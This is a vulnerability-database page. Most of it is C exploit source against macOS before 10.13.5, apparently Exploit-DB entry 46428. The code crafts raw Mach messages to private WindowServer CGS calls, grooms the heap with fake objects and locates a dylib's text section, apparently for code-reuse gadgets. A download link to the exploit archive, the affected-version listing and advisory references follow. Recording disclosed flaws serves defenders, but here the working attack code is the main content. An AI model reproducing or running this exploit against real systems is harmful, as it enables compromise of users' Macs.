"FAKE_OBJECT_WITH_A_VERY_LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOONG_NAME_%d", i); ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, key, data_bytes, data_size, false) == KERN_SUCCESS, fail); ENFORCE(_CGSCreateApplication(connection_id, psn, 1, 0, 2, getpid(), "a", false, connection_id) == -50, fail); free_tmp_application = false; usleep(10); } CFRelease(data); data = NULL; return 0; fail: if (free_application) { ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x12340000; _CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id); } if (free_tmp_application) { ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x56780000; _CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id); } for (uint32_t i = 0; i < COUNT_OF(set_array_values); i++) if (set_array_values[i] != NULL) CFRelease(set_array_values[i]); if (data != NULL) CFRelease(data); if (big_array != NULL) CFRelease(big_array); return -1; } static int find_dylib_text_section(const char *dylib_name, void **text_address, size_t *text_size) { uint32_t image_count = _dyld_image_count(); for (uint32_t i = 0; i < image_count; i++) { const char *current_dylib_name = _dyld_get_image_name(i); ENFORCE(current_dylib_name != NULL, fail); if (strcmp(current_dylib_name, dylib_name) != 0) continue; const struct mach_header_64 *dylib_header = (const struct mach_header_64 *)_dyld_get_image_header(i); ENFORCE(dylib_header != NULL, fail); ENFORCE(dylib_header->magic == MH_MAGIC_64, fail); uint32_t max_size = dylib_header->sizeofcmds; ENFORCE(max_size < 0x2000, fail); struct load_command *load_command = (struct load_command *)(dylib_header+1); struct load_command *next_command; ENFORCE(dylib_header->ncmds < 0x100, fail); for (uint32_t cmd_i = 0; cmd_i < dylib_header->ncmds; cmd_i++, load_command = next_command) { ENFORCE(load_command->cmdsize <= max_size, fail); ENFORCE(load_command->cmdsize >= sizeof(struct load_command), fail); next_command = (struct load_command *)((uintptr_t)load_command + load_command->cmdsize); max_size -= load_command->cmdsize; if (load_command->cmd != LC_SEGMENT_64) continue; ENFORCE(load_command->cmdsize >= sizeof(struct segment_command_64), fail); struct segment_command_64 *segment_command_64 = (struct segment_command_64 *)load_command; if (strcmp(segment_command_64->segname, "__TEXT") != 0) continue; struct section_64 *sections = (struct section_64 *)(segment_command_64 + 1); ENFORCE(segment_command_64->nsects < 0x100, fail); ENFORCE(load_command->cmdsize == sizeof(struct segment_command_64) + segment_command_64->nsects*sizeof(struct section_64), fail); for (uint32_t sect_i = 0; sect_i < segment_command_64->nsects; sect_i++) { if (strcmp(sections[sect_i].sectname, "__text") != 0) continue; *text_address = (void *)(sections[sect_i].addr + _dyld_get_image_vmaddr_slide(i)); *text_size = sections[sect_i].size; return 0; } } } fail: return -1; } #pragma pack(push, 4) typedef struct { mach_msg_header_t header; mach_msg_body_t body; mach_msg_ool_descriptor_t ool_serialized_value; NDR_record_t NDR_record; uint64_t connection_id; uint32_t key_len; char key[128]; uint32_t serialized_value_length; } CGSSetConnectionProperty_message_t; #pragma pack(pop) static mach_msg_return_t _CGSSetConnectionProperty(mach_port_t connection_port, int connection_id, const char *key_value, const void *serialized_value, uint32_t serialized_value_length, bool deallocate) { CGSSetConnectionProperty_message_t msg; memset(&msg, 0, sizeof(msg)); msg.body.msgh_descriptor_count = 1; msg.ool_serialized_value.type = MACH_MSG_OOL_DESCRIPTOR; msg.ool_serialized_value.address = (void *)serialized_value; msg.ool_serialized_value.size = serialized_value_length; msg.ool_serialized_value.deallocate = deallocate; msg.ool_serialized_value.copy = MACH_MSG_VIRTUAL_COPY; msg.NDR_record = NDR_record; msg.connection_id = connection_id; strncpy(msg.key, key_value, sizeof(msg.key)); msg.key_len = 127; msg.serialized_value_length = serialized_value_length; msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX; msg.header.msgh_remote_port = connection_port; msg.header.msgh_id = 29398; kern_return_t kr = mach_msg(&msg.header, MACH_SEND_MSG, sizeof(msg), 0, 0, 0, 0); return kr; } #pragma pack(push, 4) typedef struct { mach_msg_header_t header; mach_msg_body_t body; mach_msg_ool_descriptor_t ool_serialized_value; NDR_record_t NDR_record; uint32_t serialized_value_length; } CGSSetPerUserConfigurationData_message_t; #pragma pack(pop) #pragma pack(push, 4) typedef struct { mach_msg_header_t header; NDR_record_t NDR_record; uint64_t process_serial_number; uint32_t connection_id; } CGSSetAuxConn_message_t; #pragma pack(pop) static mach_msg_return_t _CGSSetAuxConn(uint32_t connection_id, ProcessSerialNumber *process_serial_number) { CGSSetAuxConn_message_t msg; memset(&msg, 0, sizeof(msg)); msg.connection_id = connection_id; msg.process_serial_number = *(uint64_t *)process_serial_number; msg.NDR_record = NDR_record; msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, 0); msg.header.msgh_remote_port = CGSGetConnectionPortById(connection_id); msg.header.msgh_id = 29368; return mach_msg(&msg.header, MACH_SEND_MSG, sizeof(msg), 0, 0, 0, 0); } #pragma pack(push, 4) typedef struct { mach_msg_header_t header; NDR_record_t NDR_record; ProcessSerialNumber sn; uint32_t session_id; uint32_t session_attributes; uint32_t unknown_2; uint32_t pid; uint32_t padding_1; uint32_t app_name_len; char app_name[128]; char multi_process; uint32_t connection_id; uint32_t padding_2; } CGSCreateApplication_message_t; typedef struct { mach_msg_header_t header; NDR_record_t NDR_record; kern_return_t retcode; } CGSCreateApplication_reply_t; #pragma pack(pop) static mach_msg_return_t _CGSCreateApplication(uint32_t connection_id, ProcessSerialNumber sn, uint32_t session_id, uint32_t session_attributes, uint32_t unknown_2, pid_t pid, char *app_name, char multi_process, uint32_t sent_connection_id) { CGSCreateApplication_message_t msg; memset(&msg, 0, sizeof(msg)); msg.connection_id = connection_id; msg.sn = sn; msg.session_id = session_id; msg.session_attributes = session_attributes; msg.unknown_2 = unknown_2; msg.pid = pid; strncpy(msg.app_name, app_name, sizeof(msg.app_name)); msg.app_name_len = 127; msg.multi_process = multi_process; msg.connection_id = sent_connection_id; msg.NDR_record = NDR_record; msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE); msg.header.msgh_remote_port = CGSGetConnectionPortById(connection_id); msg.header.msgh_id = 29507; msg.header.msgh_local_port = mig_get_reply_port(); mach_msg_return_t kr = mach_msg(&msg.header, MACH_SEND_MSG|MACH_RCV_MSG, sizeof(msg), sizeof(msg), msg.header.msgh_local_port, 0, 0); if (kr != KERN_SUCCESS) { switch (kr) { case MACH_SEND_INVALID_DATA: case MACH_SEND_INVALID_DEST: case MACH_SEND_INVALID_HEADER: mig_put_reply_port(msg.header.msgh_local_port); break; default: mig_dealloc_reply_port(msg.header.msgh_local_port); } } else kr = ((CGSCreateApplication_reply_t *)&msg)->retcode; return kr; } static void timed_log(char* format, ...) { char buffer[30]; struct tm* time_info; time_t t = time(NULL); time_info = localtime(&t); strftime(buffer, 30, "%Y-%m-%d %H:%M:%S ", time_info); fputs(buffer, stderr); va_list args; va_start(args, format); vfprintf(stderr, format, args); va_end(args); } # Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46428.zip

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version To (excluding) 10.13.5

Références

http://www.securityfocus.com/bid/107135
Tags : vdb-entry, x_refsource_BID
http://www.securitytracker.com/id/1041027
Tags : vdb-entry, x_refsource_SECTRACK
https://www.exploit-db.com/exploits/46428/
Tags : exploit, x_refsource_EXPLOIT-DB
https://support.apple.com/HT208849
Tags : x_refsource_CONFIRM